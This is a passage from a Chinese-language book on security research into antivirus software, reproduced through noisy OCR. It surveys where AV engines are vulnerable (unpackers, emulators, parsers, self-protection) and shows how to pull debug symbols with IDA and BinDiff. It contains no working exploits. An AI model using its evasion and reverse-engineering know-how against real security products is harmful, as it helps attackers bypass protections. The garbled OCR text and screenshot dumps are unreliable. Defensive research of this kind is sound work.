Ignore ani id Report as False Alert 








图 1-1 Comodo Internet Security 针 对 反 汇 编 软件 IDA 的 误 报 


4. 压缩 包 和 归档 文件 

反 病毒 内 核 的 另 一 个 关键 部 分 是 支持 压缩 和 归档 文件 格式 ， 其 中 包括 ZIP、TGZ、7z、XAR 
和 RAR 等 。 反 病毒 软件 需要 能 够 解压 缩 并 查 杀 该 类 文件 内 部 子 文件 的 安全 性 。 除 此 以 外 , 反 病毒 
软件 还 需要 支持 检测 类 似 PDF 文 件 的 数据 流 压 缩 文件 格式 。 因 为 反 病 毒 软件 必须 支持 种 类 繁多 的 
文件 格式 查 杀 , 而 在 此 过 程 中 需要 处 理 传人 的 大 量 数据 , 所 以 反 病 毒 产品 的 代码 在 这 块 特别 容易 
产生 漏洞 。 

本 书 将 会 探讨 影响 多 款 反 病 毒 产品 的 此 类 漏洞 。 

5. 脱 壳 程 序 

脱 壳 程序 通常 是 单个 或 一 系列 程序 , 用 以 去 除 保护 或 压缩 可 执行 程序 的 文件 壳 。 恶 意 可 执行 
文件 通常 会 使 用 通用 的 加 过 程序 或 (通过 合法 或 非法 手段 获得 的 ) 私有 加 壳 程 序 来 压缩 打包 , 保 
护 自己 的 内 部 代码 结构 。 相 较 于 之 前 提 到 的 压缩 和 归档 文件 , 反 病 毒 引 擎 需要 支持 脱 壳 的 种 类 更 
加 纷繁 复杂 。 而 且 ， 亚 意 软件 为 了 隐藏 内 部 逻辑 ， 躲 避 反 病毒 软件 的 查 杀 ， 几 乎 每 个 月 都 有 新 的 
文件 过 出 现 。 

一 些 加 壳 程 序 ， 比 如 UPX， 只 是 简单 地 对 可 执行 文件 进行 了 压缩 。 因 此 ,对 加 了 UPX 壳 的 文 
件 进行 脱 壳 操作 ， 是 一 件 十 分 容易 的 事情 。 但 是 ， 也 有 一 些 十 分 复杂 的 加 壳 程 序 ， 它们 通过 将 恶 
意 软件 真实 代码 转化 成 字 节 码 ， 然后 随机 抽取 一 段 或 多 段 代 码 载 人 虚拟 机 运行 。 因 此, 想 要 针对 
使 用 此 类 在 虚拟 层 实现 的 程序 进行 脱 壳 处 理 , 进而 了 解 恶 意 软件 内 部 的 逻辑 结构 , 是 一 件 十 分 耗 
时 而 且 困 难 的 事情 。 

通过 使 用 反 病 毒 引 警 中 的 CPU 模拟 器 ， 一 些 文件 壳 可 以 被 脱 除 ( 详 见 稍 后 的 内 容 ) 也 有 一 
些 脱 壳 程 序 仅 采用 了 静态 方法 。 男 外 还 有 一 些 更 为 复杂 的 脱 过 程序 , 融合 了 之 前 提 到 的 这 两 种 技 
术 一 一 先 将 程序 在 模拟 器 中 运行 ,获取 到 某 些 关键 数据 ( 如 加 密 数 据 大 小 、 加 密 算法 种 类 、 加 密 
密 钥 等 )， 接 着 基于 这 些 数据 采用 更 快 的 静态 技术 脱 壳 处 理 。 

当 你 查找 反 病 毒 产 品 中 的 漏洞 时 ， 和 处 理 压缩 、 归 档 文件 的 模块 一 样 ， 脱 壳 模 块 也 是 经 常 能 
够 发 现 漏洞 的 地 方 。 反 病毒 产品 支持 脱 壳 的 文件 壳 种 类 繁多 ,而 且 每 年 都 在 不 断 增长 。 其 中 有 一 
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些 文件 壳 只 被 特定 的 恶意 软件 家 族 使 用 , 所 以 与 此 相关 的 反 病毒 程序 逻辑 代码 可 能 在 第 一 次 写 完 
后 ， 再 也 没有 被 验证 或 审计 过 。 

6. 模拟 器 

除了 ClamAV 外 ， 市 面 上 其 余 的 反 病 毒 引 擎 都 支持 非常 多 的 模拟 器 。 反 病毒 引擎 中 使 用 最 广 
泛 的 模拟 器 是 Intel x86 模 拟 器 。 一 些 高 级 的 反 病 毒 产 品 还 支持 AMD64 或 ARM 模 拟 器 。 模 拟 器 不 
仅 限 于 常见 的 CPU 种 类 ， 比 如 Intel x86、AMD64 或 ARM, 也 有 一 些 为 编程 语言 虚拟 机 开发 的 模拟 
器 。 比 如 有 一 些 模拟 器 就 被 用 来 检查 Java 字 节 码 .Android DEX 字 节 码 JavaScript, 甚至 是 VBScript 
和 Adobe ActionScript 的 安全 性 。 

要 识别 或 绕 过 反 病 毒 产品 采用 的 模拟 和 虚拟 机 技术 十 分 容易 ， 只 要 找到 不 一 致 的 地 方 即 可 。 
比如 ， 对 Itelx86 模 拟 器 来 说 ， 反 病毒 引擎 的 开发 人 员 不 大 可 能 会 模拟 所 有 可 用 的 x86 指 令 。 对 于 
使 用 了 模拟 器 的 反 病 毒 软件 的 更 高 级 组 成 部 分 ， 比 如 说 针对 ELF 或 PE 文件 的 运行 模拟 环境 ,开发 
者 就 更 不 可 能 执行 整个 操作 系统 环境 ， 或 是 操作 系统 提供 的 每 一 个 API 了 。 因 此 ， 想 要 找到 欺骗 
和 识别 模拟 器 的 方法 其 实 十 分 容易 。 本 书 讨论 了 多 种 绕 过 和 识别 模拟 机 的 技术 。 本 书 第 三 部 分 专 
门 介绍 了 如 何 针对 特定 的 反 病毒 引擎 ， 编 写 漏洞 利用 程序 。 

7. 错综复杂 的 文件 格式 

开发 反 病毒 引擎 是 一 项 十 分 复杂 的 工程 。 之 前 我 们 讨论 了 反 病 毒 软件 普遍 带 有 的 多 个 功能 ， 
可 以 想象 要 实现 这 些 功能 需要 耗费 多 少时 间 和 精力 。 更 糟糕 的 是 , 为 了 检测 出 潜藏 在 各 类 格式 文 
件 中 的 漏洞 利用 攻击 程序 ， 反 病 毒 引 苟 需 要 支持 种 类 繁多 的 文件 格式 。 这 些 文件 格式 (不 包括 压 
缩 和 归档 文件 ) A: OLE2 容 器 文件 ( Word 或 Excel 文 档 ); HTML 页 面 、XML 文 档 ， 以 及 PDF 文 
fF; CHM 帮 助 文件 和 旧版 本 的 Microsoft 帮 助 文件 格式 ; PE、ELF 和 MachO 等 可 执行 文件 ; JPG、 
PNG 、GIF 、TGA 和 TIFF 等 图 像 文 件 格式 ; ICO 和 CUR 等 图 标 文 件 ; MP3、MP4、AVI、ASF 和 
MOV 等 视频 、 音 频 文 件 ; 等 等 。 

每 当 出 现 针 对 新 型 文件 格式 的 漏洞 利用 攻击 程序 , 反 病 毒 引 擎 就 必须 针对 该 类 文件 格式 增加 
支持 。 有 些 文件 格式 太 复 杂 了 ， 以 至 于 原 开发 者 们 处 理 起 来 都 有 问题 ， 其 中 两 个 典型 的 案例 是 : 
微软 的 Office 文 件 格式 和 Adobe 的 PDF 文件 格式 。 考 虑 到 反 病 毒 软件 开发 者 没有 针对 此 类 文件 格式 
的 处 理 经 验 , 而 且 又 需要 对 此 类 文件 做 逆向 操作 , 我 们 为 何 期 待 他 们 能 比 文件 作者 写 出 更 好 的 程 
序 ， 并 能 更 好 地 处 理 此 类 文件 呢 ? 正如 你 所 想到 的 ， 这 正 是 反 病 毒 软 件 最 容易 出 现 问题 的 地 方 ， 
而 且 在 很 长 一 段 时 间 内 都 将 是 这 样 。 



















































































1.5.2 ”高 级 功能 
接 下 来 将 讨论 一 些 反 病毒 产品 广泛 使 用 的 高 级 技术 。 


1. 流量 监控 和 防火 墙 

从 20 志 纪 90 年 代 到 2010 年 左右 , 一 种 名 叫 “ 里 虫 病毒 ”的 新 型 恶意 软件 十 分 常见 。 这 种 病毒 
通常 使 用 一 个 或 多 个 远程 漏洞 来 攻击 计算 机 的 软件 。 有 时 , 蠕虫 病毒 会 使 用 默认 的 用 户 名 及 密码 
组 合 ,通过 在 Windows CIFS 网 络 内 以 随机 的 文件 名 大 量 复制 自身 来 感染 整个 网 络 。 著 名 的 案例 有 : 
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“I love you”、Conficker 、Melissa 、Nimda 、Slammer 和 Code Red. 

正 是 由 于 许多 蠕虫 病毒 借助 网 络 感 染 计 算 机 , 反 病 毒 软件 出 现 了 镁 查 计算 机 的 上 传 下 载 流 量 
的 功能 。 为 了 实现 该 目的 , 反 病 毒 软件 会 在 计算 机 内 安装 分 析 网 络 流量 的 驱动 ， 防火墙 会 侦 测 并 
阻 断 已 知 的 攻击 。 和 之 前 提 到 的 若干 功能 一 样 , 蠕虫 病毒 肆虐 的 时 代 已 经 过 去 , 但 该 部 分 仍然 是 
反 病 毒 软件 bug 的 重要 来 源 。 反 病毒 软件 的 流量 监控 和 防火 墙 功 能 已 经 很 多 年 没有 更 新 了 ， 实 际 
上 该 部 分 功能 已 经 被 遗弃 了 , 因此 目前 它 正 遭受 着 大 量 漏洞 的 困扰 。 这 也 是 第 11 章 将 讨论 的 反 病 
毒 软件 的 远程 攻击 点 之 一 。 

2. 自我 保护 

在 反 病 毒 软 件 保护 用 户 免 受 恶 意 软 件 侵扰 的 同时 ,恶意 软件 也 在 不 断 变种 升级 ， 以 躲避 反 病 
毒 软件 的 查 杀 。 有 一 些 恶意 软件 通过 某 些 技术 ,关闭 或 禁用 反 病 毒 软件 的 服务 。 因 此 ,许多 反 病 
毒 软件 通过 系统 内 核 驱 动 实现 自我 保护 功能 ， 来 对 抗 通过 ZzwTerminateProcess 禁 用 反 病 毒 软 
件 防护 的 恶意 操作 。 有 些 反 病 毒 产 品 的 自我 保护 技术 通过 阻 断 以 某 些 参 数 调用 openProcess 来 
关闭 反 病 毒 软件 进程 ， 或 拒绝 外 部 进程 通过 调用 writeProcessMemory 向 反 病 毒 防护 进程 注入 
代码 。 

这 类 技术 一 般 通 过 系统 内 核 驱动 实现 ,当然 也 有 一 部 分 保护 功能 仅 在 用 户 环境 层 实 现 。 直 到 
2000 年 ， 反 病毒 软件 开发 人 员 才 意识 到 , 仅 在 用 户 环境 层 实 现 功 能 毫 无 用 处 。 但 截至 目前 ， 仍 有 
许多 反 病 毒 产品 在 犯 这 种 错误 。 本 书 第 三 部 分 将 会 对 此 进行 详细 讨论 。 

3. 反 漏洞 利用 程序 

包括 Windows、Mac OS X ( 现在 称 为 macOS ) 以 及 Linux 在 内 的 操作 系统 ， 目 前 纷纷 推出 了 
对 抗 漏洞 利用 的 功能 ， 也 称 为 “安全 保护 措施 ”， 比 如 最 近 开 发 出 来 的 随机 地 址 空间 分 配 技 术 
( address space layout randomization, ASLR ) 和 数据 执行 保护 技术 ( data execution prevention, DEP )。 
这 也 是 一 些 反 病 毒 套 装 提供 (或 曾经 提供 ) 反 漏洞 利用 程序 解决 方案 的 原因 。 一些 反 漏洞 利用 技 
术 的 原理 是 在 每 一 个 可 执行 程序 的 进程 和 动态 链接 库 上 应 用 ASLR 和 DEP 技 术 。 当 然 也 有 一 些 更 
加 复杂 的 技术 。 例 如 ， 通 过 在 用 户 和 系统 内 核 层 hook 特 定 进 程 的 操作 ， 通 过 盘查 放行 部 分 操作 。 

遗憾 的 是 ， 很 多 反 病 毒 软 件 提供 的 反 漏 洞 利用 程序 仅 在 用 户 环境 层 通 过 hook 技 术 实现 。 
Malwarebytes 的 反 漏 洞 利用 程序 就 是 一 个 例子 。 随 着 微软 EMET (Enhanced Mitigation Experience 
Toolkit) 方案 的 出 现 ,， 大 多 数 带 有 反 漏 洞 利 用 程序 的 反 病 毒 软 件 相形 见 红 ， 显 得 十 分 不 完善 ， 而 
日 很 容易 被 绕 过 。 

对 于 反 病 毒 软件 来 说 , 拥有 反 漏 洞 利 用 程序 功能 在 某 些 情况 下 比 没有 还 要 糟糕 。 一 个 典型 案 
例 是 采用 了 ASLR 技 术 的 Sophos 栈 溢出 保护 系统 (buffer overflow protection system, BOPS ) X A 
谷歌 的 安全 研究 员 Tavis Ormandy 发 现 其 中 一 个 DLL 文件 没有 启用 ASLR 保 护 。 该 DLL 文件 本 意 是 ， 
在 类 似 Windows XP 这 样 没有 引入 ASLR 技 术 的 操作 系统 内 ， 实 现 类 似 ASLR 的 技术 ; 但 实现 该 功 
能 的 DLL 文件 本 身 却 没有 启用 ASLR。 结 果 ， 在 支持 ASLR 的 系统 中 (如 Windows Vista), ASLR 
保护 技术 最 终 因为 该 DLL 文件 被 禁用 。 

更 多 关于 反 病 毒 软 件 工具 功能 实现 过 程 中 的 问题 ， 将 在 本 书 的 第 四 部 分 讨论 。 
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1.6 总结 

本 章 开 篇 介绍 了 反 病 毒 产 品 的 历史 、 各 种 类 型 的 恶意 软件 , 以 及 反 病 毒 软 件 和 恶意 软件 技术 
的 演变 。 我 们 可 以 发 现 ， 在 这 场 攻防 斗争 中 ， 恶 意 软 件 似乎 一 直 占 据 上 风 。 在 本 章 的 后 半 部 分 ， 
我 们 一 起 剖析 了 反 病 毒 套 装 的 各 个 组 成 部 分 ， 并 对 其 中 的 基础 和 高 级 功能 进行 了 简要 的 讨论 。 这 








也 为 后 续 章 节 中 针对 各 个 功能 进行 详细 介绍 做 了 铺垫 。 总 而 言 之 ， 本 章 可 以 归纳 为 以 下 内 容 。 


方式 。 








口 在 过 去 ， 反 病毒 软件 并 不 是 很 完善 。 由 于 只 有 命令 行 式 扫描 器 以 及 一 个 特征 码 数据 库 ， 
反 病 毒 软件 常 被 称 为 扫描 器 。 随 着 恶意 软件 不 断 演进 ， 反 病毒 软件 也 在 不 断 升级 。 如 今 ， 
反 病 毒 软 件 已 经 有 了 启发 式 引 敬 ， 而 且 致 力 于 保护 浏览 器 、 网 络 数据 包 、 邮 件 附件 以 及 
文档 文件 。 

口 恶意 软件 类 型 有 许多 种 ， 包 括 木马 病毒 、 恶 意 软件 、 感 染 型 病毒 、Rootkit、 里 虫 病毒 、 

Neo 漏洞 利用 程序 、Shellcode ， 等 等 。 

受 金钱 、 惠 窃 知 识 产权 等 利益 的 驱使 ， 人 
ox ub 背后 也 有 政府 机 构 的 身影 ， 其 目的 大 多 是 
维护 自身 的 利益 。 

口 反 病毒 软件 在 市 场 营销 时 会 使 用 各 种 时 瞩 的 术语 ， 这 种 营销 方式 很 容易 误导 大 众 ， 使 他 

们 产生 一 种 百分之百 安全 的 错觉 。 

口 反 病毒 软件 是 一 个 以 反 病 毒 内 核 作 核 心 ， 辅 以 插件 、 系 统 服 务 、 文 件 监控 驱动 以 及 反 病 

毒 内 核 模块 等 功能 的 综合 系统 。 

口 反 病 毒 软件 需要 能 够 快速 流畅 地 运行 。 使 用 类 似 C/C++ 等 本 机 语言 编写 反 病毒 软件 是 最 好 
的 选择 , 因为 它们 运行 时 不 需要 解释 器 (类似 虚 拟 机 解释 器 ), 而 是 直接 在 本 机 编译 运行 。 
不 过 ， 反 病毒 软件 的 一 些 模块 可 以 由 托管 式 或 解释 型 语言 编写 。 

a 反 病 毒 软件 的 基础 功能 包括 : 反 病 毒 内 核 、 扫 描 引 擎 、 特 征 库 、 解 包 程序 、 模 拟 器 ， 以 
及 针对 各 类 格式 文件 的 解 包 分 析 程 序 。 另 外 ， 反 病毒 产品 可 能 还 会 提供 一 些 高 级 功能 
比如 流量 监控 功能 、 浏 览 器 安全 插件 、 自 我 保护 和 反 漏洞 利用 程序 功能 。 

在 下 一 章 , 我 们 将 开始 讨论 如 何 逆 向 反 病 毒 软件 的 内 核 , 研究 自动 化 安全 测试 和 模糊 测试 的 

模糊 测试 是 查找 反 病 毒 软 件 中 安全 缺陷 的 一 种 手段 。 
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一 款 反 病毒 软件 的 核心 是 其 内 部 引擎 , 也 被 称 作 内 核 。 内 核 在 将 反 病 毒 软件 各 个 重要 部 分 整 
合 在 一 起 的 同时 ， 也 为 它们 提供 功能 上 的 支持 。 比 如 ， 扫 描 吕 借助 反 病毒 软件 内 核 提供 的 APL， 
完成 针对 文件 、 目 录 、 内 存 和 其 他 形式 的 扫描 分 析 。 

本 童 将 讨论 如 何 逆向 分 析 反 病毒 产品 内 核 ， 并 从 攻击 者 的 视角 介绍 反 病毒 软件 中 有 哪些 值 
得 关注 的 特性 。 反 病毒 软件 通常 会 采取 一 些 措施 ， 来 保护 自己 不 被 逆向 分 析 。 因 此 ， 本 草 还 将 
介绍 使 逆向 分 析 过 程 更 容易 的 若干 技术 。 在 本 童 最 后 ， 你 可 以 使 用 Python 编 写 一 个 能 够 直接 与 
反 病 毒 产 品 内 核 交 互 的 独立 工具 ， 然 后 通过 该 工具 进行 模糊 测试 或 探索 自动 化 测试 反 病毒 软件 
绕 过 技术 。 


2.4 逆向 分 析 工 具 


本 书 中 提 到 的 软件 逆向 分 析 工 具 ， 事 实 上 是 指 IDA 反 汇编 商业 版 。 接 下 来 关于 反 病 毒 软件 逆 
向 分 析 技巧 的 介绍 ， 是 建立 在 你 对 IDA 有 一 定 了 解 的 基础 之 上 的 ， 因 为 你 将 使 用 它 完 成 一 系列 静 
态 和 动态 的 分 析 任 务 。 本 章 还 用 到 了 WinDbg 和 GDB， 它 们 分 别 是 Windows 和 Linux 平 台 上 的 标准 
调试 软件 。 本 章 的 案例 将 会 使 用 Python， 在 IDA 内 或 使 用 IDAPython 插 件 来 完成 典型 的 逆向 分 析 
任务 ， 编 写 不 依赖 第 三 方 的 独立 脚本 。 

由 于 本 章 涉 及 恶意 软件 和 反 病 毒 软件 绕 过 技术 ， 强 烈 建议 你 安装 虚拟 化 软件 (如 VMware、 
VirtualBox 或 QEMU )， 构 建安 全 的 虚拟 实验 环境 。 接 下 来 的 部 分 将 会 提 到 ， 调 试 符 号 对 你 开展 调 
试 工作 非 党 有 和 帮助。 通常 ，Linux 版 本 的 反 病毒 软件 很 有 可 能 会 自 带 调试 符号 。 

如 果 你 想 亲 自动 手 做 实验 ， 建议 你 搭建 两 个 虚拟 机 环境 一 一 一 个 是 Windows 环 境 ， 男 一 个 是 
Linux 环 境 。 
























































2.1.1 命令 行 工具 与 GUI 工具 


目前 所 有 的 反 病 毒 产 品 都 提供 图 形 用 户 界面 (graphical user interface, GUI )， 以 便 用 户 进 行 
软件 配置 、 结 果 查 看 、 定 时 扫描 设置 等 工作 。 因 为 GUI 扫描 器 并 不 专门 与 反 病 毒 引 擎 及 其 他 许多 
模块 交互 ， 所 以 分 析 起 来 有 一 定 难 度 。 仅 仅 是 分 析 哪 些 GUI 扫 描 器 的 代码 控制 着 GUI 绘图 、 刷 新 、 
窗 体 事件 等 ， 就 需要 联合 运用 静态 和 动态 分 析 手 段 ， 这 绝对 是 一 项 不 小 的 工程 。 幸 运 的 是 ， 如 今 
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有 一 些 反 病毒 产品 还 提供 独立 的 命令 行 扫 描 器 。 命 令 行 工 具 相 较 于 GUI 工具 小 了 很 多 ， 且 通常 相 
对 独立 。 因 此 ， 研 究 命令 行 工具 ， 成 为 了 我 们 开启 逆向 工程 之 旅 的 第 一 步 。 

有 一 些 反 病毒 软件 是 运行 在 其 中 央 服 务 器 上 的 , 因此 , 使 用 这 类 扫描 引擎 其 实 是 在 使 用 服务 
器 组 件 ， 而 不 是 命令 行 工具 或 GUI 工具 。 在 这 类 情况 下 ， 反 病毒 服务 器 会 为 命令 行 工 具 打 开 一 个 
网 络 通信 端口 , 以 供 连 接 和 交互 。 不 过 这 并 不 代表 服务 器 需要 在 自己 的 机 器 上 真 的 有 一 块 提供 扫 
描 服 务 的 区 域 ， 而 是 只 要 在 服务 右 系 统 上 启用 一 个 本 地 系统 服务 即 可 。 比 如 ，Linux 版 Avast 和 卡 
巴 斯 基 反 病 毒 产 品 都 有 各 自 的 病毒 查 杀 服务 器 以 及 与 之 相连 的 GUI 扫描 器 或 命令 行 扫 描 器 ,会 向 
服务 器 发 送 扫 描 请 求 ,并且 等 待 返回 的 查 杀 结 果 。 如 果 你 逆向 分 析 这 类 命令 行 工具 ,最 终 只 能 
到 有 关 通 信 协 议 的 代码 。 即 便 你 足够 幸运 ,发 现 了 反 病 毒 云 服 务 器 的 远程 漏洞 ,但 还 是 无 法 知道 
这 类 反 病 毒 软件 的 内 核 是 如 何 工作 的 。 想 要 了 解 这 一 点 , 就 必须 逆向 分 析 之 前 提 到 的 服务 器 端的 
反 病 毒 引 擎 模块 。 

在 接 下 来 的 部 分 中 ， 我 们 将 以 反 病 毒 软件 Linux 版 Avast 的 服务 器 组 件 作 为 研究 对 象 。 



























































2.4.2. ”调试 符号 


在 Windows 平 台 上 ， 反 病毒 产品 提供 与 之 对 应 的 调试 符号 的 情况 并 不 常见 。 但 在 类 Unix 系 统 
中 ,调试 符号 通常 会 随 第 三 方 产品 提供 (通常 内 置 在 二 进 制 文件 中 )。 如 果 没 有 与 逆向 分 析 列 表 
相对 应 的 函数 和 标签 名 称 ， 缺 少 反 病毒 软件 的 调试 符号 , 那么 逆向 分 析 反 病毒 产品 及 其 任意 模块 
将 会 是 一 项 艰巨 的 任务 。 正 如 你 将 看 到 的 那样 , 我 们 可 以 采用 一 些 技巧 和 工具 来 找到 目标 反 病 毒 
产品 的 部 分 或 全 部 调试 符号 。 

当 一 款 反 病毒 软件 可 以 同时 兼容 多 个 系统 平台 时 , 这 并 不 意味 着 它 在 不 同 的 系统 中 有 不 同 的 
源 代 码 。 同 样 ， 对 于 兼容 多 系统 的 反 病 毒 产品 来 说 ,在 不 同系 统 平 台 版 本 间 共 用 反 病 毒 软件 内 核 
的 部 分 或 全 部 源 代码 很 常见 。 在 那些 情况 下 ,你 会 发 现 ， 只 要 在 一 个 系统 平台 上 逆向 分 析 了 反 病 
毒 软 件 的 内 核 ， 在 另外 一 个 平台 上 的 分 析 将 会 变 得 很 容易 。 

当然 也 有 例外 。 比 如 ， 反 病毒 产品 没有 针对 特定 的 系统 平台 〈 比如 针对 Mac OS X) 开发 与 
之 兼容 的 内 核 , 而 是 直接 从 另外 的 供应 商 处 获得 反 病 毒 引 擎 的 使 用 授权 。 如 果 反 病毒 软件 厂商 打 
算 将 另 一 个 产品 的 内 核 整 合 进 自己 的 产品 ， 只 需要 更 改 产 品名 、 版 权 声明 ， 以 及 其 他 一 些 资源 ， 
比如 字符 串 、 图 标 和 图 像 即 可 。 如 今 许多 厂商 都 采用 了 这 种 办 法 ， 他 们 从 Bitdefender 那 里 获得 其 
产品 和 引擎 的 使 用 授权 ， 并 融入 自己 的 产品 中 。 

回 到 最 初 的 问题 上 来 : 如 何 了 解 反 病毒 引 警 的 工作 方式 ?你 需要 去 查看 ， 你 的 分 析 目 标 是 
否 有 针对 类 Unix 的 操作 系统 (Linux、BSD 或 Mac OS X ) 版 本 ,以 及 与 之 对 应 的 调试 符号 是 否 内 
置 在 二 进 制 文件 中 。 如 果 你 足够 幸运 的 话 ， 就 能 获取 到 针对 该 平台 的 反 病 毒 产品 的 调试 符号 。 
此 外 ， 由 于 反 病 毒 产 品 的 引擎 在 不 同 操作 系统 平台 和 版 本 上 几乎 是 相同 的 〈 只 有 一 些 细小 的 差 
异 ， 如 系统 特定 的 API 和 运行 时 库 )， 你 可 以 把 一 个 平台 上 的 调试 符号 用 在 另 一 个 平台 上 的 逆向 
分 析 过 程 中 。 
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2.1.3 提取 调试 符号 的 技巧 


我 们 已 经 知道 ,在 类 Unix 的 操作 系统 中 , 很 有 可 能 获取 到 反 病 毒 产 品 的 调试 符号 ,本 节 将 用 
反 病 毒 软 件 F-Secure 作 为 案例 。F-Secure 的 fm 库 在 Windows 和 Linux 平 台 上 分 别 是 fm4av.dll 和 
libfm-lnx32.so。 不 过 , Windows 版 本 针对 该 库 没有 内 置 调试 符号 , 而 在 Linux 版 本 的 二 进 制 文件 中 ， 
则 有 许多 针对 该 产品 内 核 和 其 他 模块 的 调试 符号 。 

图 2-1 展 示 了 通过 IDA 获 取 到 的 F-Secure Windows 版 本 的 函数 列表 。 





































À IDA - C:\audits\fsecure\fm4av.dll 
File Edit Jump Search View Debugger Options Windows 


|» O [no debugger zje 
IB NM 


[F] Functions window 


























sub 10001020 
sub 10001040 «te: 
sub_10001060 ates 
sub_10001080 be 
sub_10001080 .te: 
sub 100010E0 „te: 
sub_10001130 „tes 
ub 10001150 ke: 
ub 10001180 ate: 
sub_10001190 .te: 
sub 100011B0 te: 
sub 10001280 „tes 
sub_10001360 „te 
sub_10001370 ate: 
sub 100013D0 te: 
sub 10001510 te: 
sub 100015B0 te: 
sub_100015C0 „te: 
sub_100017F0 atez 
sub_10001850 ate 
sub_10001870 ate: 
sub_100018F0 ,bey 
sub_10001930 „tes 
sub_10001B10 „tes 
sub_100018D0 „tes 
sub_10001F70 ‘te: 
sub_10002060 














Line 1 of 5162 


2-1 IDA 逆 向 分 析出 的 F-Secure Windows 版 本 函数 列表 
在 图 2-2 中 ，IDA 通 过 Linux 版 本 二 进 制 文件 中 内 置 的 调试 符号 ， 列 出 了 有 意义 的 函数 名 称 。 
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Hle Edit Jump Search View Debugger Options Wi 


]i$ J| e - 9 [l5 5 851 [ [sa |lld 
E ' IN 


[F] Functions window nex 


























Function name 

Fd ;ALKExplodelint,LZArchiveEntry *) 
ALKExplodelint,LZArchiveEntry *) 
ALKMakeTablelshort,uchar *,ulong, short,ushort ... 
ALKMakeTable(short,uchar *,ulong, short,ushort ... 
ALKfillbuflint, LZArchiveEntry *, LZHDecodingStat.. 
ALKfillbuflint, LZArchiveEntry *,LZHDecodingStat... 
ALKgetbits(int, LZArchiveEntry *.LZHDecodingSt... 
ALKgetbits(int, LZArchiveEntry *,LZHDecodingSt.. 
ALKinit getbits(int, LZArchiveEntry *, LZHDecodin.. 
ALKinit getbits(int,LZArchiveEntry *, LZHDecodin... 
ARJListRles(ARJFileDatal *) 

ARJListFiles(ARJFileDatal *) 

ARJPrepareProc(int, ARJArchiveEntry *) 
ARJPrepareProc(int, ARJArchiveEntry *) 
ARJReadData(int, ARJArchiveEntry *,uchar *,ulong.. 
ARJReadDatalint, ARJArchiveEntry *,uchar *, ulong... 
ARJ CloseArchivedRle(ARJFileDatal *,ARJArchiveE.. 
ARJ CloseArchivedFile(ARJFileDatal *,ARJArchiveE... 
ARJ CloseRile(ARJRleDatal *) 

ARJ CloseRile(ARJRleDatal *) 

ARJ CloseSearch(ARJFileDatal *, short) 

ARJ CloseSearch(ARJFileDatal *, short) 

ARJ RleRead(ARJRileDatal *,ARJArchiveEntry *,uch... 
ARJ RileRead(ARJRileDatal *, ARJArchiveEntry *,uch... 
ARJ RleSeek(ARJFileDatal *,ARJArchiveEntry *.lon... 
ARJ RleSeek(ARJFileDatal *,ARJArchiveEntry *.lon... 
ARJ RieTell(ARJRleDatal *,ARJArchiveEntry *,long *) 
ARJ RileTell(ARJFileDatal *, ARJArchiveEntry *,long *) 
ARJ, FindFirstFile(ARJFileDatal *, short *,ARJFilelnfo *) 
ARJ FindFirstRile(ARJRleDatal *, short *, ARJFilelnfo *) 
ARJ FindNextFile(ARJFileDatal *, short, ARJFilelnfo *) 
ARI FindNextRle(ARIRleDatal * short ARIFlelnfo s 2: 
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Line 1 of 5834 








图 2-2 F-Secure Linux 版 本 的 libfmx-linux32.so 库 在 IDA 中 的 逆向 分 析 结 果 


除了 不 同 平台 版 本 间 存 在 的 少数 例外 ， 反 病毒 软件 内 核 几 乎 是 一 致 的 。 考 虑 到 该 项 特性 ,你 
可 以 先 从 反 病 毒 软 件 的 Linux 版 本 着 手 。 大 多 数 相关 功能 在 Windows 版 本 里 也 是 类 似 的 。 你 可 以 
通过 zynamics BinDiff 等 第 三 方 商业 二 进 制 文件 对 比 产 品 ， 将 Linux 版 本 下 的 相关 调试 符号 导入 到 
Windows 版 本 下 。 可 以 首先 针对 两 个 平台 上 的 库 进行 二 进 制 分 析 和 对 比 ， 接 着 将 相 匹 配 的 调试 符 
号 ， 通 过 右 击 Matched Functions 按 钮 同时 勾 选 Import Functions and Comments ， 将 Linux 版 本 下 的 
调试 符号 导出 到 Windows 版 本 下 (人 参见 图 2-3 )。 

在 许多 时 候 ， 与 F-Secure 反 病毒 软件 只 有 部 分 调试 符号 的 情况 不 同 ， 可 能 在 某 些 反 病 毒 软件 
的 二 进 制 文件 中 ,你 能 够 提取 出 带 有 变量 名 甚至 是 标签 名 的 完整 调试 符号 。 在 那 种 情况 下 ， 上 面 
讨论 的 相关 提取 技术 同样 可 行 。 
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0.95 1003E1C3 sub_1003E1C3_1379 F7278B3C : Z18SetFMMIMELastErrorm 

0.95 10020650 sub 10020650 601 F7351B84 x86cpuid_GetFirm 

093 . 10069067 sub 10069D67 3281 F72873E0 BZ2 bzReadGetUnused 

0,94 10083034 sub 10083034 4033 F7288300 -Z9BzipCloseP12BZIP ARCHIVE 

0,94 10035AF0 sub_10035AF0_1167 F727747C .ZN9. gnu cxxl7 normal iteratorIP14FPropertyV.. 
0.94 10035400 sub_10035A00_1166 F7275A4C ,ZN20CMfcMultipartMessageC1EP11CMFfcMessage 
0.93 10084897 sub 1008497 4059 F727680C + Z9BzipCloseP12BZIP ARCHIVE 

0.94 10075E30 sub. 10075E30 3659 F7287340 BZ2 bzReadClose 

0.93 1007926A sub 10079264 3818 F72882A4 Z2iBzipCloseArchivedltemPI2BZIP ARCHIVEPSBZIP. 
0,93 10010580 fmFindClose F727FEFO fmFindClose 

0.94 10026520 sub_10026520_797 F72765FC » ZNaFsStdLibémemCpyEPvPKvi 

0,93 1009719F sub 1009719F 4495 F72D1EA8 -Zi6dotz copy streamPvPS Pm 

0.94 1001DE30 sub 1001DE30 488 F72D51EC -ZN29FmPackerManagerImplementation! 7packerGet... 
0.91 1006798E sub 1006798E 3158 F72E76D0  -ZN20NsisDecoder Container 7ISBZip2EPKh 

0.92 10033490 sub 10033490 1111 F72FCFFA -ZNIOCMfcStringéassignERKS. 

0.94 10048450 — NLG Notify F727B13C ..Zi8fmDeleteSyncObjectP12FMSyncObject 

0.92 10023C40 sub_10023C40_710 F72D8564 -ZNI3FmUnpackerRar21packerParentalCleanUpEPv 
0.91 10067008 sub 10067DD8 3177 F72A56D8 -Zi6decode start lzSiPL4LZArchiveEntryP 16LZHDec... 
0.90 1001D610 sub 1001610 474 F728AD50 -ZiiCabReadDataPvS imPmmPh 

0.90 100697D5 sub 100697D5 3258 F72E64E0 -ZNK16ContainerDecoder2O0TakeFromCachedBufferE.... 
0.92 100700F4 sub 100700F4 3525 F72E2880 _ZN10FileReader 10GetSettingElPI 

0.91 100A91DC sub 100A91DC 4727 F735EE6C LamaEncode 

